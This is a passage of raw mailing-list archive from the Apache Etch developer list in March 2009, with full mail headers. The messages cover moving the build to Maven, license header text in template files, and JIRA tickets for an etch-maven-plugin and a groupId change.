500); 5 Mar 2009 08:04:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31032 invoked by uid 99); 5 Mar 2009 08:04:57 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Mar 2009 00:04:57 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wf-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Mar 2009 08:04:48 +0000 Received: by wf-out-1314.google.com with SMTP id 25so4169315wfc.21 for <[email protected]>; Thu, 05 Mar 2009 00:04:27 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to :content-type:content-transfer-encoding; bh=BTqVC+Br7XtXqASW6X86FaikOhyPFotyHpUqQ4hKp+A=; b=jFHtvlseRywr6xpjN1tD+EKRXaVPDHMhMuQFBekPvtDFgcYxxidOokVIbmzqd/Vaa6 fr6TouGVtGAZ6MVx1XfEijgOWmnymfys1BkXIlZWN+GUpD/c5Duxyl3aVvuHUuOK3Yuu ONVt9tXCD6IUCHCQM8H5246Evc7vQOk1gK8Ug= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:content-type :content-transfer-encoding; b=MxpIc2njlZc/bDY/F89UlujehQCK92tUmY6sgaq4oQepPPH6EctrG9Pqvx0q8zr4Mb 5q5yzYu78jO4koA9YEOsxRer8tguInwkEcha6ikmIyeRlBox6wjaKsofdB221ghwvpVz 6keGk6lD8oIHLMrUYibgVaJUCmnxR1yNRJiq4= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id q5mr414457wfa.12.1236240267706; Thu, 05 Mar 2009 00:04:27 -0800 (PST) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 5 Mar 2009 16:04:27 +0800 X-Google-Sender-Auth: ea363a7a0de74cb6 Message-ID: <[email protected]> Subject: Re: Mavenizing the Etch build tree From: Niclas Hedhman <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org On Tue, Mar 3, 2009 at 9:36 PM, scott comer (sccomer) <[email protected]> wrote: > agreed. i think the tree is well designed for mavenization. > > the only problem, perhaps not insurmountable, is that maven easily supports > only java. perhaps it is reasonable that on the the java build be supported. > the csharp build still requires ant... I think this page may assist in making the right choices; http://activemq.apache.org/building-csharp-code.html Cheers Niclas -- http://www.qi4j.org - New Energy for Java From [email protected] Thu Mar 05 14:43:33 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32701 invoked from network); 5 Mar 2009 14:43:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Mar 2009 14:43:33 -0000 Received: (qmail 61518 invoked by uid 500); 5 Mar 2009 14:43:33 -0000 Delivered-To: [email protected] Received: (qmail 61505 invoked by uid 500); 5 Mar 2009 14:43:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 61494 invoked by uid 99); 5 Mar 2009 14:43:32 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Mar 2009 06:43:32 -0800 X-ASF-Spam-Status: No, hits=-1.8 required=10.0 tests=HTML_MESSAGE,RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rtp-iport-2.cisco.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Mar 2009 14:43:21 +0000 X-IronPort-AV: E=Sophos;i="4.38,307,1233532800"; d="vcf'?scan'208,217";a="39065803" Received: from rtp-dkim-2.cisco.com ([161.129.204.104]) by rtp-iport-2.cisco.com with ESMTP; 05 Mar 2009 14:42:59 +0000 Received: from rtp-core-2.cisco.com (rtp-core-2.cisco.com [161.129.204.104]) by rtp-dkim-2.cisco.com (8.12.11/8.12.11) with ESMTP id n25Egxqf016660 for <[email protected]>; Thu, 5 Mar 2009 09:42:59 -0500 Received: from xbh-rtp-211.amer.cisco.com (xbh-rtp-211.cisco.com [161.129.204.104]) by rtp-core-2.cisco.com (8.13.8/8.13.8) with ESMTP id n25EgxeW028446 for <[email protected]>; Thu, 5 Mar 2009 14:42:59 GMT Received: from xfe-rtp-201.amer.cisco.com ([161.129.204.104]) by xbh-rtp-211.amer.cisco.com with Microsoft SMTPSVC(262)914-4166); Thu, 5 Mar 2009 09:42:59 -0500 Received: from [161.129.204.104] ([161.129.204.104]) by xfe-rtp-201.amer.cisco.com with Microsoft SMTPSVC(262)914-4166); Thu, 5 Mar 2009 09:42:59 -0500 Message-ID: <[email protected]> Date: Thu, 05 Mar 2009 08:42:55 -0600 From: "scott comer (sccomer)" <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20081209) MIME-Version: 1.0 To: [email protected] Subject: Re: Mavenizing the Etch build tree References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: multipart/mixed; boundary="------------060004090903060002020503" X-OriginalArrivalTime: 05 Mar 2009 14:42:59.0191 (UTC) FILETIME=[ADBC8070:01C99DA0] DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; l=2773; t=1236264179; x=1237128179; c=relaxed/simple; s=rtpdkim2001; h=Content-Type:From:Subject:Content-Transfer-Encoding:MIME-Version; d=cisco.com; [email protected]; z=From:=20=22scott=20comer=20(sccomer)=22=20<[email protected] om> |Subject:=20Re=3A=20Mavenizing=20the=20Etch=20build=20tree |Sender:=20 |To:[email protected]; bh=2CIgd7W74kAiZxSzcJv6ch+vwbJMj77p8+7RTJawV0s=; b=L6WQuLE4Cz/Eqr9ZnU5DKFLFcur2VSa4pnau7i/rkYLEAX7iRVo6c8thnY YpzTrg4qD2qKdVYbVeEEFOXmtS1NgLMLo4B0aOoophsInGkuJ+hlQj4uldKM JcfLw3yapa; Authentication-Results: rtp-dkim-2; [email protected]; dkim=pass ( sig from cisco.com/rtpdkim2001 verified; ); X-Virus-Checked: Checked by ClamAV on apache.org --------------060004090903060002020503 Content-Type: multipart/alternative; boundary="------------010003040207060703070001" --------------010003040207060703070001 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit thanks, niclas! scott out Niclas Hedhman wrote: > On Tue, Mar 3, 2009 at 9:36 PM, scott comer (sccomer) <[email protected]> wrote: > >> agreed. i think the tree is well designed for mavenization. >> >> the only problem, perhaps not insurmountable, is that maven easily supports >> only java. perhaps it is reasonable that on the the java build be supported. >> the csharp build still requires ant... >> > > I think this page may assist in making the right choices; > http://activemq.apache.org/building-csharp-code.html > > > Cheers > Niclas > --------------010003040207060703070001 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type"> <title></title> </head> <body bgcolor="#ffffff" text="#000000"> thanks, niclas!<br> <br> scott out<br> <br> Niclas Hedhman wrote: <blockquote cite="mid:[email protected]" type="cite"> <pre wrap="">On Tue, Mar 3, 2009 at 9:36 PM, scott comer (sccomer) <a class="moz-txt-link-rfc2396E" href="mailto:[email protected]">&lt;[email protected]&gt;</a> wrote: </pre> <blockquote type="cite"> <pre wrap="">agreed. i think the tree is well designed for mavenization. the only problem, perhaps not insurmountable, is that maven easily supports only java. perhaps it is reasonable that on the the java build be supported. the csharp build still requires ant... </pre> </blockquote> <pre wrap=""><!----> I think this page may assist in making the right choices; <a class="moz-txt-link-freetext" href="http://activemq.apache.org/building-csharp-code.html">http://activemq.apache.org/building-csharp-code.html</a> Cheers Niclas </pre> </blockquote> </body> </html> --------------010003040207060703070001-- --------------060004090903060002020503-- From [email protected] Sat Mar 07 22:26:03 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29273 invoked from network); 7 Mar 2009 22:26:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Mar 2009 22:26:03 -0000 Received: (qmail 96966 invoked by uid 500); 7 Mar 2009 22:26:02 -0000 Delivered-To: [email protected] Received: (qmail 96952 invoked by uid 500); 7 Mar 2009 22:26:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96941 invoked by uid 99); 7 Mar 2009 22:26:02 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Mar 2009 14:26:02 -0800 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO yw-out-1718.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Mar 2009 22:25:54 +0000 Received: by yw-out-1718.google.com with SMTP id 4so721282ywq.0 for <[email protected]>; Sat, 07 Mar 2009 14:25:34 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=9H/xyTO/NjxiptdpLdWCPc/Vy8idGGZNignyuc17YwY=; b=o/MYj1NRYJCZ91pKrCPaBCwtOEcbj+4KYv7pr06XUxN4ZfNfz9DN5S1dhksKIo6KXR clHcTVREE8Q4rTLYnVWl6TwzWT9u1i37BSbq+wDUYE2WLElnns96b98I+YnuXOPfZ/oz mkCoq5PYknWNMf8AB8EBmxagZcVGWQfmLQczI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=lZ86XkE/CddqEwuLkKOgHbZd8ls3QNwn0Qy/vsH+XSj8Hanmtkl7SN8+hH4P42bKYq 1nGo7olJ0XP/OVqa2EPcmfkL2byA53Njtwo+guAXtOvy+QviK44yzAEPpsBdvECFWhZv BQtVaNURRcsMUdAcE6zyryYB/HFHba6uWa5KY= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id u7mr2694626anf.147.1236464734017; Sat, 07 Mar 2009 14:25:34 -0800 (PST) Date: Sat, 7 Mar 2009 16:25:33 -0600 Message-ID: <[email protected]> Subject: Copyright notices From: Richard Bolkey <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0016e644ba1a3f9c0104648ee180 X-Virus-Checked: Checked by ClamAV on apache.org --0016e644ba1a3f9c0104648ee180 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Noticed that the license notice on all the *.vm files in 'etch/binding-java/compiler/src/main/resources/org/apache/etch/bindings/java/compiler' is a little different. I'm guessing they need to be changed? ## Copyright 2007-2008 Cisco Systems Inc. ## ## Licensed under the Apache License, Version 2.0 (the "License"); you may not ## use this file except in compliance with the License. You may obtain a copy ## of the License at ## ## http://www.apache.org/licenses/LICENSE-2.0 ## ## Unless required by applicable law or agreed to in writing, software ## distributed under the License is distributed on an "AS IS" BASIS, WITHOUT ## WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the ## License for the specific language governing permissions and limitations ## under the License. --0016e644ba1a3f9c0104648ee180-- From [email protected] Sat Mar 07 23:17:17 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49882 invoked from network); 7 Mar 2009 23:17:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Mar 2009 23:17:17 -0000 Received: (qmail 27149 invoked by uid 500); 7 Mar 2009 23:17:17 -0000 Delivered-To: [email protected] Received: (qmail 27131 invoked by uid 500); 7 Mar 2009 23:17:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27109 invoked by uid 99); 7 Mar 2009 23:17:17 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Mar 2009 15:17:17 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Mar 2009 23:17:16 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2CACF234C498 for <[email protected]>; Sat, 7 Mar 2009 15:16:56 -0800 (PST) Message-ID: <1870130264.1236467816181.JavaMail.jira@brutus> Date: Sat, 7 Mar 2009 15:16:56 -0800 (PST) From: "Richard Bolkey (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (ETCH-62) etch-maven-plugin MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org etch-maven-plugin ----------------- Key: ETCH-62 URL: https://issues.apache.org/jira/browse/ETCH-62 Project: Etch Issue Type: New Feature Reporter: Richard Bolkey Attachments: Adding_the_etch-maven-plugin.patch Adding a maven plugin that can execute the etch compiler to generate a binding inside a maven project (much like javacc-maven-plugin). * The plugin needs to support all the parameters of the compiler. * The plugin needs to be able to generate a binding from etch files and includes. * The plugin needs to be able to retrieve etch files and includes from project dependencies (so that the etch files can be their own artifact if desired). -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Mar 07 23:17:17 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49883 invoked from network); 7 Mar 2009 23:17:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Mar 2009 23:17:17 -0000 Received: (qmail 27168 invoked by uid 500); 7 Mar 2009 23:17:17 -0000 Delivered-To: [email protected] Received: (qmail 27133 invoked by uid 500); 7 Mar 2009 23:17:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27110 invoked by uid 99); 7 Mar 2009 23:17:17 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Mar 2009 15:17:17 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Mar 2009 23:17:16 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 337B3234C4AF for <[email protected]>; Sat, 7 Mar 2009 15:16:56 -0800 (PST) Message-ID: <639166388.1236467816210.JavaMail.jira@brutus> Date: Sat, 7 Mar 2009 15:16:56 -0800 (PST) From: "Richard Bolkey (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (ETCH-62) etch-maven-plugin In-Reply-To: <1870130264.1236467816181.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/ETCH-62?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Richard Bolkey updated ETCH-62: ------------------------------- Attachment: Adding_the_etch-maven-plugin.patch Here's the patch for the etch-maven-plugin I've developed. All source files contain an ASF license header. > etch-maven-plugin > ----------------- > > Key: ETCH-62 > URL: https://issues.apache.org/jira/browse/ETCH-62 > Project: Etch > Issue Type: New Feature > Reporter: Richard Bolkey > Attachments: Adding_the_etch-maven-plugin.patch > > Original Estimate: 1h > Remaining Estimate: 1h > > Adding a maven plugin that can execute the etch compiler to generate a binding inside a maven project (much like javacc-maven-plugin). > * The plugin needs to support all the parameters of the compiler. > * The plugin needs to be able to generate a binding from etch files and includes. > * The plugin needs to be able to retrieve etch files and includes from project dependencies (so that the etch files can be their own artifact if desired). -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Mar 07 23:19:19 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52332 invoked from network); 7 Mar 2009 23:19:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Mar 2009 23:19:19 -0000 Received: (qmail 27402 invoked by uid 500); 7 Mar 2009 23:19:19 -0000 Delivered-To: [email protected] Received: (qmail 27390 invoked by uid 500); 7 Mar 2009 23:19:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27379 invoked by uid 99); 7 Mar 2009 23:19:19 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Mar 2009 15:19:19 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Mar 2009 23:19:17 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 440F9234C498 for <[email protected]>; Sat, 7 Mar 2009 15:18:56 -0800 (PST) Message-ID: <1440261804.1236467936277.JavaMail.jira@brutus> Date: Sat, 7 Mar 2009 15:18:56 -0800 (PST) From: "Richard Bolkey (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (ETCH-63) Change maven groupId to "org.apache.etch" from "etch.etch" MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Change maven groupId to "org.apache.etch" from "etch.etch" ---------------------------------------------------------- Key: ETCH-63 URL: https://issues.apache.org/jira/browse/ETCH-63 Project: Etch Issue Type: Improvement Components: build Reporter: Richard Bolkey The best practice for the group id of a maven artifact is the base package name, in our case "org.apache.etch". -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Mar 07 23:21:19 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52556 invoked from network); 7 Mar 2009 23:21:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Mar 2009 23:21:19 -0000 Received: (qmail 29894 invoked by uid 500); 7 Mar 2009 23:21:19 -0000 Delivered-To: [email protected] Received: (qmail 29886 invoked by uid 500); 7 Mar 2009 23:21:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29874 invoked by uid 99); 7 Mar 2009 23:21:19 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Mar 2009 15:21:19 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Mar 2009 23:21:17 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 1AB71234C498 for <[email protected]>; Sat, 7 Mar 2009 15:20:56 -0800 (PST) Message-ID: <220150860.1236468056108.JavaMail.jira@brutus> Date: Sat, 7 Mar 2009 15:20:56 -0800 (PST) From: "Richard Bolkey (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (ETCH-63) Change maven groupId to "org.apache.etch" from "etch.etch" In-Reply-To: <1440261804.1236467936277.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/ETCH-63?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Richard Bolkey updated ETCH-63: ------------------------------- Attachment: Changing_groupId_to_org_apache_etch_from_etch_etch.patch Here's a fix. > Change maven groupId to "org.apache.etch" from "etch.etch" > ---------------------------------------------------------- > > Key: ETCH-63 > URL: https://issues.apache.org/jira/browse/ETCH-63 > Project: Etch > Issue Type: Improvement > Components: build > Reporter: Richard Bolkey > Attachments: Changing_groupId_to_org_apache_etch_from_etch_etch.patch > > Original Estimate: 1h > Remaining Estimate: 1h > > The best practice for the group id of a maven artifact is the base package name, in our case "org.apache.etch". -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Mar 08 01:48:29 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31522 invoked from network); 8 Mar 2009 01:48:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Mar 2009 01:48:29 -0000 Received: (qmail 91746 invoked by uid 500); 8 Mar 2009 01:48:29 -0000 Delivered-To: [email protected] Received: (qmail 91735 invoked by uid 500); 8 Mar 2009 01:48:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91720 invoked by uid 99); 8 Mar 2009 01:48:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Mar 2009 17:48:29 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO asmtpout012.mac.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 08 Mar 2009 01:48:21 +0000 MIME-version: 1.0 Content-transfer-encoding: 7BIT Content-type: text/plain; charset=ISO-8859-1; format=flowed Received: from [161.129.204.104] (cpe-70-116-77-177.austin.res.rr.com [161.129.204.104]) by asmtp012.mac.com (Sun Java(tm) System Messaging Server 6.3-8.01 (built Dec 16 2008; 32bit)) with ESMTPSA id <[email protected]> for [email protected]; Sat, 07 Mar 2009 17:47:30 -0800 (PST) X-Proofpoint-Virus-Version: vendor=fsecure engine=1.12.7400:2.4.4,1.2.40,4.0.166 definitions=2009-03-07_03:2009-03-05,2009-03-07,2009-03-07 signatures=0 Message-id: <[email protected]> Date: Sat, 07 Mar 2009 19:47:30 -0600 From: scott comer <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20081209) To: [email protected] Subject: Re: Copyright notices References: <[email protected]> In-reply-to: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org whoop, right you are. Richard Bolkey wrote: > Noticed that the license notice on all the *.vm files in > 'etch/binding-java/compiler/src/main/resources/org/apache/etch/bindings/java/compiler' > is a little different. I'm guessing they need to be changed? > > ## Copyright 2007-2008 Cisco Systems Inc. > ## > ## Licensed under the Apache License, Version 2.0 (the "License"); you may > not > ## use this file except in compliance with the License. You may obtain a > copy > ## of the License at > ## > ## http://www.apache.org/licenses/LICENSE-2.0 > ## > ## Unless required by applicable law or agreed to in writing, software > ## distributed under the License is distributed on an "AS IS" BASIS, WITHOUT > ## WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the > ## License for the specific language governing permissions and limitations > ## under the License. > > From [email protected] Sun Mar 08 01:50:28 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32293 invoked from network); 8 Mar 2009 01:50:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Mar 2009 01:50:27 -0000 Received: (qmail 92107 invoked by uid 500); 8 Mar 2009 01:50:27 -0000 Delivered-To: [email protected] Received: (qmail 92098 invoked by uid 500); 8 Mar 2009 01:50:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 92087 invoked by uid 99); 8 Mar 2009 01:50:27 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Mar 2009 17:50:27 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO asmtpout018.mac.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 08 Mar 2009 01:50:19 +0000 MIME-version: 1.0 Content-transfer-encoding: 7BIT Content-type: text/plain; charset=ISO-8859-1; format=flowed Received: from [161.129.204.104] (cpe-70-116-77-177.austin.res.rr.com [161.129.204.104]) by asmtp018.mac.com (Sun Java(tm) System Messaging Server 6.3-8.01 (built Dec 16 2008; 32bit)) with ESMTPSA id <[email protected]> for [email protected]; Sat, 07 Mar 2009 17:49:59 -0800 (PST) X-Proofpoint-Virus-Version: vendor=fsecure engine=1.12.7400:2.4.4,1.2.40,4.0.166 definitions=2009-03-07_03:2009-03-05,2009-03-07,2009-03-07 signatures=0 Message-id: <[email protected]> Date: Sat, 07 Mar 2009 19:49:59 -0600 From: scott comer <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20081209) To: [email protected] Subject: etch maven plugin... X-Virus-Checked: Checked by ClamAV on apache.org anyone have any problem with me rolling this into the 1.1 release? thanks, scott out From [email protected] Sun Mar 08 02:09:13 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39979 invoked from network); 8 Mar 2009 02:09:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Mar 2009 02:09:13 -0000 Received: (qmail 3180 invoked by uid 500); 8 Mar 2009 02:09:12 -0000 Delivered-To: [email protected] Received: (qmail 3165 invoked by uid 500); 8 Mar 2009 02:09:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 3154 invoked by uid 99); 8 Mar 2009 02:09:12 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Mar 2009 18:09:12 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO yw-out-1718.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 08 Mar 2009 02:09:04 +0000 Received: by yw-out-1718.google.com with SMTP id 4so756852ywq.0 for <[email protected]>; Sat, 07 Mar 2009 18:08:43 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:from:to :in-reply-to:content-type:content-transfer-encoding:x-mailer :mime-version:subject:date:references; bh=iYaatmjpAUseDYzyiwwYm7w+LFBA0KmmOSKvwpYvp5M=; b=UcFsfW59V4n0V8eI4X55eJuE8VO5YUf+FTYrDIYuU5d9eE9doU0QD35Z12f+15V29U 